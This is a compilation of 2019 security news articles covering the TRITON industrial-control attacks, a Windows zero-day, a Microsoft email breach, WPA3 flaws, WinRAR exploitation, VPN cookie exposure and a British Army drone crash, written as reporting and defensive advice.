STE WILLIAMS

As attackers focus on cyber-physical systems, companies must improve their visibility into IT system compromises as well as limit actions on operational-technology networks, experts say.

Security experts have a warning for critical-infrastructure companies: The group behind the TRITON attack on industrial control systems is not unique. 

After revealing last week that the same set of tools used by the TRITON attackers were also found in a second victim’s network, security services firm FireEye stressed that attackers are likely in the networks of some of the facilities that are home to the 18,000 Triconex safety systems installed in plants worldwide.

“The reason we published this information is that we believe this is happening elsewhere,” says Nathan Brubaker, senior manager of cyber threat analysis at FireEye. “We found them twice, and that is not very likely considering how many targets there are in the world. There is a decent chance they are in other systems.”

The findings underscore that critical-infrastructure companies are increasingly in the crosshairs of attackers, particularly nation-state operatives who may be attempting to find ways to hobble rival nations in the event of hostilities. In the middle of 2017, for example, two ransomware attacks—WannaCry and NotPetya—encrypted data on a computer systems worldwide, causing some operational-technology (OT) networks at large companies to halt. Pharmaceutical manufacturer Merck, package delivery service FedEx and shipping firm A.P. Moller-Maersk were all victims of the attack. 

At the end of that year, a Middle East plant was the victim of a more targeted attack. Attackers compromised the IT network of petrochemical firm – reportedly, Petro Rabigh, an integrated refinery and petrochemical facility on the west coast of Saudi Arabia – and infected its systems with the TRITON malware framework, which could have caused significant damage to the facility.   

“Attackers have moved from spreading malware to cause widespread havoc across multiple systems—without a specific target—to gaining detailed technical knowledge on industrial control systems to target specific industries, countries, and companies,” says Mark Carrigan, chief operating officer at PAS Global. “This increased sophistication increases the chance that they can cause physical damage at an industrial facility.”

Companies need to better defend themselves, say experts, with gaining better visibility into traffic and anomalies on the information-technology network being a good first step.

FireEye, for example, underscored that it detected both TRITON attacks by improving the visibility that defenders had into the activity on their network. Last week in Singapore, FireEye released details of the second attack at the Kaspersky Security Analyst Summit, identifying specific tools discovered on systems in the unnamed company’s network. While FireEye did not say that it found the specific malware component of the TRITON framework that targets Schneider Electric Triconex safety systems, the company did find the same collection of tools that a group had previously used to attack the Saudi Arabian petrochemical firm.

“We have high confidence that it is the same group,” Brubaker says.

By tracking identifying key hubs of activity and “arterial systems,” companies can spot attackers’ activities before they impact OT systems, he says.

“The point of our blog is that you can stop 95% of attacks against industrial control systems—like sophisticated attacks—by looking for—by monitoring and defending against those attacks … this is how we caught this threat actor in the new environment,” Brubaker says.

Broader Focus

Security firms focused on the security of industrial systems argued that companies should focus on both the IT and OT system. Unless a firm has perfect visibility into the traffic on its network, focusing only on one half of the equation seems misguided, says Joe Slowik, adversary hunter for Dragos, an industrial-control system (ICS) security firm. 

“There are a number of advantages in focusing on the OT environments,” he says. “They are, presumably, more limited in scope than what you see with an IT network, so you can take advantage of that to build out a better defensive posture … We cannot control or predict what the adversary will do, but we can restrict the capabilities they have once they are in our environments.”

Because the TRITON attack is only the latest in a series of compromises of industrial control systems, critical-infrastructure firms should focus on all their ICS assets, adds PAS Global’s Carrigan. 

“These systems are highly designed and engineered so that in case of any failure, the process is shutdown gracefully,” he says. So attackers will likely aim to “defeat the safety system, and in parallel, infiltrate additional industrial control systems at the same facility to manipulate the process beyond safe operating limits, which can lead to equipment damage, environmental incidents, and loss of life.”

The problem for most firms, however, is that making changes in the operational technology environment is almost never straightforward. 

“Every asset manager that has been paying attention, every single one of them will agree that there are issues and changes that need to be made,” says Dragos’ Slowik. “The issue comes down to what sort of timing and lifecycle is available to you to be able to implement those changes.”

Related Content

• Triton/Trisis Attacks Another Victim
• New IoT Security Bill: Third Time’s the Charm?
• Industrial Safety Systems in the Bullseye
• TRITON Attacker Disrupts ICS Operations, While Botching Attempt to Cause Physical Damage
• First Malware Designed Solely for Electric Grids Caused 2016 Ukraine Outage

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/triton-attacks-underscore-need-for-better-defenses/d/d-id/1334418?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The CVE-2019-0859 vulnerability, patched last week, is the latest in a string of Windows local privilege escalation bugs discovered at Kaspersky Lab.

Kaspersky Lab researchers today disclosed more details about CVE-2019-0859, one of two Windows zero-day vulnerabilities under active attack when Microsoft issued patches early last week.

CVE-2019-0859 and CVE-2019-0803 are elevation of privilege bugs. The former was discovered by Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin, the latter by Alibaba’s Cloud Intelligence Security Team. Berdnikov and Larin teamed up with malware analyst Anton Ivanov to publish more insight around the flaw, which has been reportedly exploited by an “unknown criminal group” trying to gain full control on a target device.

Kaspersky Lab found CVE-2019-0859 last month when their automatic exploit prevention systems detected an attempt to abuse a Windows vulnerability. Further analysis revealed a zero-day bug in win32k.sys – the fifth exploited local privilege escalation vulnerability in Windows they had discovered since October. They reported the bug to Microsoft on March 17; it was patched along with 73 other vulnerabilities on the most recent Patch Tuesday.

The exploit Berdnikov and Larin saw in the wild targeted 64-bit versions of Window, ranging from Windows 7 to 10. This particular attack was directed at the kernel of target systems via a backdoor constructed from a core component of the Windows operating system.

Following successful exploitation, it executed PowerShell with a Base64 encoded command. This command downloaded a second-stage script from PasteBin, and the second-stage PowerShell script executed the third stage – also a PowerShell script. This final script unpacks shellcode, allocates executable memory, copies shellcode to allocated memory, and calls CreateThread to execute shellcode, researchers explain in a blog post. Its primary goal was to create a backdoor, which provided the attacker with persistent access on the target system.

As Microsoft put in its advisory, CVE-2019-0859 would let a successful attacker run malicious code in kernel mode and install programs, view, change, or delete data, or create new accounts with full user rights. They’d have to first log onto the system and run the crafted application.

“This allows you to escalate privilege and get the same privileges the system has,” Larin says. “It’s the highest level of privilege you can have.”

What makes this incident particularly interesting is the attacker used the Metasploit framework, a publicly available tool, in conjunction with an exploit that’s much harder for attackers to come by. “Zero-day exploits [are] not available for the general public,” Larin continues. “Only advanced actors use them.” The use of Metasploit also complicates attribution in this scenario, Larin explains, because it’s freely available for everyone.

Taking a look back, this string of privilege escalation bug discoveries started with CVE-2018-8453, which was found by the Kaspersky Lab team in August and fixed in October. The exploit was seen being used in targeted attacks, during which it was executed by the first stage of a malware installer to achieve privileges needed to persist on victim systems. In November, Microsoft patched CVE-2018-8589, another Windows zero-day found by the KL researchers.

The trend continued: December brought a patch for CVE-2018-8611, a Win32k elevation of privilege flaw inside the Kernel Transaction Manager that could be used to escape the sandbox in modern browsers. In March, Microsoft patched CVE-2019-0797, a Windows zero-day believed to be in use among several attack groups, including FruityArmor and SandCat.

Cybercriminals are quickly ramping up their use of PowerShell malware, which grew 432% in 2017. This type of malware abuses the legitimate functionality of the scripting tool to launch malicious activity; it’s a popular target because it simplifies the concealment of illicit activity.

Related Content:

• The Single Cybersecurity Question Every CISO Should Ask
• 8 ‘SOC-as-a-Service’ Offerings
• Tax Hacks: How Seasonal Scams Cause Yearlong Problems
• Senate Report on Equifax Raises Questions Ahead of FICO Product Announcement

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/new-details-emerge-on-windows-zero-day/d/d-id/1334422?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

An unknown attacker used a support agent’s credentials to access email content belonging to some Outlook, Hotmail users.

Microsoft on Monday maintained that an incident reported over the weekend about an unknown attacker using a customer support agent’s credentials to access email content belonging to users of MSN, Outlook, and Hotmail accounts, affected only a limited number of users.

In initial comments on Saturday to TechCrunch—the first to report on the intrusion—Microsoft confirmed that email accounts belonging to just a few users had been compromised.

The company said the attackers had not accessed or viewed the actual content of the emails or any attachments. Instead, only certain other information related to a user’s account such as the email address, subject lines, email folders, and email addresses of people the user has communicated with, had been viewed or accessed.

An email from Microsoft to one of the victims that was later posted Saturday to Reddit, described the unauthorized access as lasting from Jan. 1, 2019 and March 28, 2019. The letter warned the user to be wary about phishing attempts while noting that Microsoft had no idea why the intruders might have viewed the email information or how it might have been used. Microsoft immediately disabled the stolen credentials preventing further misuse the company said.

In later comments, including those made to Dark Reading today, Microsoft admitted that the intruders had actually accessed and viewed email content in some cases. The company did not provide any specifics on the number of users that might have had their email accounts compromised in this manner, however.

“Our notification to the majority of those impacted noted that bad actors would not have had unauthorized access to the content of e-mails or attachments,” a Microsoft spokesperson said. However, with approximately 6% of the already “limited subset” of users overall that were impacted, the attackers had unauthorized access to email content as well.

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” the company said. Microsoft also has increased detection and monitoring of the impacted email accounts out of an abundance of caution.

Questions Remain

The relatively scant details from Microsoft about the intrusion is prompting questions about how attackers might have obtained the support agent’s credentials, why the breach remained undetected for close to three months, how the company discovered it, and what the intruders might have been after.

Similarly, it’s unclear if the support agent was specifically targeted because of the access that his or her credentials provided to customer email information.

“This breach, albeit seemingly fairly limited in scope, still follows a familiar pattern,” said David Higgins, technical director at CyberArk. “Attackers compromised privileged credentials in order to gain greater access to wider customer data.” The takeaway for enterprises is to pay more attention to administrator accounts and to accounts with privileged access to sensitive customer and business data.

Attacks involving the use of valid credentials can be very hard to detect, added Tim Erlin, vice president of product management and strategy at Tripwire. So it is important for organization to ensure and enforce separation of duties to mitigate the scope of attacks such as the one on Microsoft he said.

“While there’s a certain amount of schadenfreude in discussing the security failings of a company like Microsoft, these types of incidents should really force every organization to evaluate how they’ve implemented their own security controls,” Erlin said.

News of the Microsoft email hack somewhat ironically enough came just days after news about Yahoo reaching a $117.5 million accord with victims of breaches at the company that ended up exposing email addresses, passwords, and other data of some 3 billion users.

Related Content:

• 773 Million Email Addresses, 21 Million Passwords For Sale on Hacker Forum
• Yahoo Reaches $117.5M Breach Accord Following Failed Settlement
• Beyond Passwords: Why Your Company Should Rethink Authentication
• 6 Reasons Why Employees Violate Security Policies

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/microsoft-downplays-scope-of-email-attack-/d/d-id/1334423?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Unknown hackers broke into databases of nonprofit and have posted online personal info on FBI, Secret Service, Capitol Police, US Park Police, others.

A data breach of systems operated by chapters of an FBI-affiliated nonprofit organization has exposed personal information of thousands of law enforcement personnel and affiliated individuals.

According to the Associated Press, home addresses and phone numbers, emails, and employers’ names were published online on at least 1,400 employees of the FBI, Secret Service, Capitol Police, US Park Police, and other federal agencies as well as police and sheriffs’ deputies in North Carolina and Florida. This was part of a data release exposing information on more than 23,000 people overall.

The hacked databases were operated by three chapters of the FBI National Academy Associates Inc, a 501(c)(3) organizations that, according to its mission, is dedicated to, “Impacting communities by providing and promoting law enforcement leadership through training and networking.” Association members are graduates of the FBI National Academy Program.

Data indicates the hackers were able to capture significantly more data than they posted online; the stolen information is believed to be available for purchase by criminals.

For more, read here and here.

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/data-on-thousands-of-law-enforcement-personnel-exposed-in-breach/d/d-id/1334424?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers have discovered several holes in a new security protocol for wireless networks. It warrants patching because although no one has exploited the bugs in the wild yet, they’re severe enough to let people steal your Wi-Fi passwords.

Researchers Mathy Vanhoef of New York University Abu Dhabi and Eyal Ronen of Tel Aviv University KU Leuven discovered the flaws in the WPA3 Wi-Fi authentication protocol. They published the results of their research in a technical paper, which you can get from Vanheof’s dedicated microsite. Vanhoef also discovered the KRACK vulnerability that affected WPA2 in 2017.

The Wi-Fi Alliance launched WPA3 in June 2018 to improve security over the previous Wi-Fi standard, WPA2. It came in two flavours: WPA3-Personal, and WPA3-Enterprise.

WPA3-Personal is the problematic one. It uses an authentication protocol called Simultaneous Authentication of Equals (SAE), also known as Dragonfly. A WPA3-Personal device uses it as a handshake mechanism to connect with other Wi-Fi-enabled devices.

In a paper on the topic, the pair explained:

Even with WPA3, an attacker within range of a victim can still recover the password of the network. This allows the adversary to steal sensitive information such as credit cards, password, emails, and so on, when the victim uses no extra layer of protection such as HTTPS.

The researchers discovered several attacks against the protocol that fall into three categories. One category forces a device to downgrade the security that it’s using. The other gives hackers enough information to deduce a password using side channel information, which is data leaked incidentally as part of another process. Finally, there’s a denial of service attack.

One of the downgrade bugs relies on WPA3’s backward compatibility with WPA2, which the Alliance included to make the transition to new devices smoother.

WPA3 devices interacting with WPA2 kit use a mode called WPA3-Transition. An attacker can force WPA3 devices using this mode to connect using WPA2 and capture part of the WPA2 handshake, which they can then use to recover the Wi-Fi password.

There are two side-channel attacks. The first targets WPA3 access points using a particular security group, which is a class of security used to exchange secrets.

Access points using the multiplicative security groups modulo a prime have a response time that varies according to the password being used. An attacker can work out how long it would take for the access point to process each password in their dictionary. They can then use the observed time to narrow down the list of possible passwords.

Attackers with access to the client device connecting to a network can also look at its memory access patterns when it’s in the middle of a Dragonfly handshake because they reveal information about the password being used. They could do this using something as simple as browser-based JavaScript code, the researchers say. Then, it’s off to the races with another dictionary attack.

This dictionary attack wouldn’t take long, they add:

The side-channel vulnerabilities can, for instance, be abused to brute-force all 8-character lowercase passwords with as little as $125 worth of Amazon EC2 instances.

Finally, an attacker can also flood an access point by bypassing the technique that WPA3 uses to stop people using fake MAC addresses. It can bring a network to its knees with as few as 16 forged connection attempts per second, they said.

As part of their research, the attackers also discovered serious flaws in EAP-PWD. This is a protocol that authenticates using a password. It is used in Android 4.0, and remote access servers using the RADIUS protocol. It is also used infrequently by some Wi-Fi networks. These bugs could allow an attacker to impersonate a user and access a Wi-Fi network without knowing the user’s password, they said.

At the time of writing, the researchers had not released the EAP-PWD details, because the bugs were so severe.

Luckily, these researchers followed responsible disclosure. They informed the Wi-Fi Alliance before releasing their findings, and it issued a press release. It said:

WPA3-Personal is in the early stages of deployment, and the small number of device manufacturers that are affected have already started deploying patches to resolve the issues.

What to do

If you have a WPA3 wireless access point at home, check with your vendor to see if there is a patch. And as always, be extra careful when connecting to public access points over which you have no control. Client-side virtual private networks (VPNs) to encrypt your data are always a good idea.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/SHjec1-y4I8/

UK police are planning to issue online warnings to young gamers hoping to deter them from a life of cybercrime, they revealed last week.

Officers planning a multimillion-pound cybercrime prevention drive identified a link between teenage gamers and cybercrime, warning that 82% of young people recruited by online criminals had developed their cybercrime skills through video gaming. Peter Goodman, chief constable at the Derbyshire Constabulary and cybercrime lead for the National Police Chiefs’ Council (NPCC) said many in this group were “on the autistic spectrum”.

In a statement sure to anger many young video game players, Goodman added that many of them lack any credibility or traction in the real world, and get their self-esteem from online gaming.

Kids will often cheat online, which sets up a dark path for them, he added:

It’s really easy to take the next step into sending malware to their school because they don’t like the way they are treated at school, or sending some malware to the local housing office and shutting them down because mum and dad haven’t got the house they want.

Police have been taking measures to catch these kids early and set them on the right track, he said:

If you go to certain sites as a gamer and you are looking for opportunities to cheat online, if you are of a certain age profile, you will have a message pop up from the National Crime Agency on the screen which will say ‘Do you know what you’re about to do is probably illegal? It’s a Computer Misuse Act offence.’

Gamers have regularly been the subject of concern among anti-cybercrime groups. In 2016, the National Crime Agency (NCA) teamed up with security testing certification non-profit organization CREST to produce a report that also suggested a link between computer gaming and serious cybercrime.

The report, called Identify, Intervene, Inspire, even published a kind of cybercrime career pathway which began with computer gaming and online gaming before moving into cheating, computer game modifications, and participation in hacking forums. Young people would then progress into trying to “beat the system”, before moving into crime for financial gain and finally serious cybercrime, it said.

The National Crime Agency’s National Cyber Crime Unit (NCA NCCU) sent letters or emails to young people who had registered their details on websites encouraging illegal activities, the report said. Sometimes, police even visited their homes.

The NPCC announcement last week created a dedicated cybercrime unit for every police force in England and Wales, granting them access to £7m in funding. The UK’s Regional Organised Crime Units (ROCUs) will coordinate the new local units, the NPCC said. Previously, only 31% of police forces had a dedicated anti-cybercrime capability, it explained.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/THe9BMsPrIE/

After three years of embarrassing rejection, might Microsoft’s newly-Chromed Edge browser be on the up?

The company last week released two 64-bit Windows 10 versions of its handiwork, the first tagged as ‘Dev channel’ updated weekly, the second a ‘Canary Channel’ version updated daily (a more stable Beta Channel version with six-weekly updates is in the works).

Drip feeding enthusiasts something new is never a bad approach, especially now that Edge is no longer a feature buried inside Windows 10 and wants to be a story on its own.

Ironically, the big anticipation of this new Edge is that it’s now based on open-source Chromium, the same code used by Google inside its Chrome browser which has pounded Microsoft for nearly 11 years.

The download even says Chromium version 74.1.96.24, not far behind the timeline published for Google’s Chrome 74 even if the new Edge is still months off a final release. As Windows corporate vice president Joe Belfiore warned:

In these first builds we are very much focused on the fundamentals and have not yet included a wide range of feature and language support that will come later.

As Naked Security noted in December when the announcement was made, it’s a huge change marker for Microsoft, which for years invested heavily in its in-house EdgeHTML and Chakra-powered Edge codebase as the natural successor to Internet Explorer (IE).

A lot of people thought Edge was a decent browser whose take-up remained stubbornly around 4% because users had long since settled on Chrome, Firefox or Safari to do the job.

Others complained that it was riddled with almost as many security problems as its ill-fated predecessor and was too wedded to its own non-standard technologies that developers disliked.

Narrowing gene pool

What is unmistakable is that three of the top five popular browsers are now based on Chromium, the other being Opera. That leaves Safari, tied to Apple, and Firefox as the only independents.

Critics might point out that this looks a lot like the IE monoculture that spurred the development of Firefox in 2002, and Google Chrome in 2008, as Redmond dawdled. (Between those two dates, excluding service packs, Microsoft released only one version, IE 7.)

Assuming Microsoft backports it to replace the forlorn IE, and converts current Windows 10 Edge users, this will mean that Chromium-based browsers will have up to 85% browser user share.

Microsoft will contribute to Chromium but there’s no getting away from the power Google now has.

Alternatively, the Chromium Edge browser’s selling point will be that it is a way to have something that looks and behaves a lot like Chrome without being as intimately connected to Google’s surveillance.

One could argue that Microsoft has an interest in the same surveillance but that would remain true had it stuck to its current Edge browser.

As for how many users will take to the new Edge, it’s hard to imagine it won’t do better than the current Microsoft version (converting IE holdouts could ensure that).

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/zDZ6KAfJJCc/

Identified as CVE-2018-20250, an ancient WinRAR vulnerability made public in February is now well on its way to becoming one of the most widely and rapidly-exploited security flaws of recent times.

The latest evidence is a report from Microsoft’s Office 365 Threat Research team which identified it as being used by the ‘MuddyWater’ APT group to target organizations in the satellite and communications industry.

For those unfamiliar with WinRAR, it’s a hugely popular Windows compression utility dating back to the 1990s which, a security company discovered, had a serious RCE flaw that had been sitting inside it for 19 years.

WinRAR was far too tempting for cybercriminals to ignore, within days stirring up a hornet’s nest of exploits to the tune of 100 or more.

Exploiting the vulnerability depended on a defunct file format called ACE, support for which was dropped by the utility’s developers with the release of version 5.71 beta after they were told of the issue in advance of its disclosure.

That was weeks before its existence became public but unfortunately, news travels slowly and a lot of users failed to update.

In that sense, Microsoft’s blog about recent targeted attacks serves as a warning to organisations or individuals who haven’t done that yet.

Detected in early March, it’s a sophisticated nation-state phishing attack (hence the APT designation, which signifies this type of attacker), which uses a Word attachment that claims to be from the Ministry of Foreign Affairs (MFA) of the Islamic Republic of Afghanistan as the lure.

Opening this triggers a further download from a OneDrive link (now inactive) to an archive containing a second Word file within which is embedded a macro initiating the payload.

Eventually a PowerShell script, which opens a command backdoor for the attackers to deliver the malicious ACE file with the CVE-2018-20250 exploit.

It’s involved stuff because the attackers still have to trick the user via a bogus warning dialogue into restarting the PC for the attack to work. Despite that, this kind of attack is founded on a percentages game that assumes someone will fall for the ruse – and one is more than enough for a targeted attack.

As Microsoft observes:

The attacks that immediately exploited the WinRAR vulnerability demonstrate the importance of threat vulnerability management in reducing organizational risk.

What is striking is how similar the attack design described by Microsoft is to numerous other reported attacks exploiting the same WinRAR vulnerability.

How did a flaw stay hidden for so long?

Because software development can be complicated, as WinRAR’s developers noted in their release notes for the patched version:

WinRAR used this third-party library to unpack ACE archives. UNACEV2.DLL had not been updated since 2005 and we do not have access to its source code. So we decided to drop ACE archive format support to protect security of WinRAR users.

Patch or remove

Apart from updating and/or removing WinRAR, admins might want to send out a warning about the attack MO, especially the issue of not opening ACE archives under any circumstances (remembering that archives can be renamed to bypass suspicion).

The other takeaway is not to assume that because the attacks detected so far have been connected to nation states that this will always be the case. Commercial exploits won’t be far behind – WinRAR’s half a billion reported users is a lot of victims to aim at.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/DaNZI5jrH1c/

The US-Cert is raising alarms following the disclosure of a serious vulnerability in multiple VPN services.

A warning from the DHS cyber security team references the CMU Cert Coordination Center’s bulletin on the failure of some VPN providers to encrypt the cookie files they place onto the machines of customers.

Ideally, a VPN service would encrypt the session cookies that are created when a user logs in to access the secure traffic service, thus keeping them away from the prying eyes of malware or network attacks. According to the alert, however, sometimes those keys were being kept unencrypted, either in memory or on log files, allowing them to be freely copied and re-used.

From directory traversal to direct travesty: Crash, hijack, siphon off this TP-Link VPN box via classic exploitable bugs

READ MORE

“If an attacker has persistent access to a VPN user’s endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods,” the post explains. “An attacker would then have access to the same applications that the user does through their VPN session.”

To be clear, the vulnerable cookies are on the user’s end, not on the server itself. We’re not talking about a takeover of the VPN service, but rather an individual customer’s account. The malware would also need to know exactly where to look on the machine in order to get the cookies.

So far, vulnerable parties include Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS, Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2, and Cisco AnyConnect 4.7.x and prior. Palo Alto has already released a patch.

Check Point and pfSense, meanwhile, have confirmed they do encrypt the cookies in question.

Possibly dozens more vendors are going to be added to the list, however, as this practice is believed to be widespread. The site notes that over 200 apps have yet to confirm or deny that their session cookies are left unencrypted.

“It is likely that this configuration is generic to additional VPN applications,” the notice explains. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/12/uscert_vpn_alert/

A British Army Watchkeeper drone stalled itself and crashed into the sea on a bad weather flight test, military investigators have said – though most of the wreckage was never found.

The unmanned aircraft, tail number WK042, fell from the sky in February 2017 while trialling a new ice detection system. The drone was being flown from West Wales Airport, formerly known as Aberporth Airfield, by 47 Regiment Royal Artillery.

Investigators concluded that one of its pitot probes used for reading the aircraft’s speed and angle of attack (AOA) became blocked, causing the Watchkeeper’s onboard flight control logic to enter an erratic series of climbs and dives until it stalled itself and flopped into the sea. They criticised the craft’s maker, Thales, for not fully understanding how its algorithms responded to loss of accurate sensor data.

Air Marshal Susan Gray, director-general of the Defence Safety Authority, criticised the Ministry of Defence and Thales for their “incomplete level of detailed technical understanding” regarding the drone and its systems. So far the British military has crashed five Watchkeepers, including two in quick succession during 2017, which led to a months-long grounding of the entire fleet.

Those two crashes, of which WK042 was one, were not publicly revealed until a senior Navy officer blabbed about them within earshot of a sharp-eared reporter, prompting accusations of an MoD cover-up over the troubled multimillion-pound programme.

The automated decision-making that led to the crash has some parallels with the recent Boeing 737 Max controversy, in which automated flight control software has been fingered as a potential factor in two fatal airliner crashes that cost hundreds of lives. The Watchkeeper crash investigators stated:

The software algorithms used to identify and disqualify single sensor failure were not always well understood by [Thales] within the UK. Consequently, the effectiveness of the algorithms at maintaining the integrity of the air data required by the [flight control system] for safe flight was in part unknown.

“From its detailed analysis,” wrote Air Marshal Gray in her formal comments on the Service Inquiry (SI) report, “the SI concluded that the design of [Watchkeeper’s] air data system limited its ability to fly safely in cloud and precipitation.” A buildup of moisture in the Watchkeeper’s pitot probes was found to have caused its automated flight logic to start doing crazy things – ultimately leading to a stall and a crash.

Ice, ice, baby

After taking off uneventfully from Aberporth on the scheduled icing detection trial flight, WK042 climbed first to 3,000ft in the hope of finding icing conditions, gradually stepping up to 8,800ft. It then “experienced high wind that was momentarily on the allowable limits”, prompting its operators to command a descent and return to base.

Watchkeeper is not flown like a conventional aeroplane with a human sitting at a stick and rudder. Its operators select waypoints on a screen for the drone to fly itself towards. During flight, its onboard logic decides precisely how the drone arrives at those waypoints, within constraints selected by human operators. Watchkeeper’s predecessor, the Hermes 450, could be flown manually but this design feature was not included on the British Army’s craft.

Twenty minutes later, a spate of warnings began to be displayed to the operators as their controls relayed the drone’s violent oscillations. Fifteen minutes after that, contact with the Watchkeeper was lost. In that last quarter of an hour, the drone “pitched up and down repeatedly between 3,200ft and 3,500ft” until it “descended rapidly into the sea” about two miles northwest of the hamlet of Llangrannog, which itself is four or five miles northeast of Aberporth Airfield.

Among the warnings displayed to its operators during the pitching incidents were “estimated AOA in use” and “flight envelope protection active”, indicating that the Watchkeeper was no longer trusting its sensors. Thales’ own investigators concluded that the left tail fin had been damaged or possibly even been torn from the airframe by the violent manoeuvres, “causing a catastrophic loss of control”, though the MoD inquiry downgraded this to saying it was a contributory factor but not the critical one.

A seabed search using remote underwater vehicles failed to turn up any of the Watchkeeper wreckage, though RAF personnel later found one of its composite panels washed up on a beach. That was the sum of wreckage found by investigators – all the analysis was done from data transmitted by the UAV back to its ground station. There is no “black box” on a Watchkeeper.

The SI report into WK042 is here.

The MoD has 50 Watchkeepers remaining on charge. Another report into WK050 – the 2018 crash on land near Aberporth village – is expected soon, while The Register will be separately reporting about the crash of WK043, which also had an unscheduled surface/aircraft interaction event a month after the drone featured in this article. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/15/watchkeeper_drone_crash_wk042_moisture_blocked_pitot/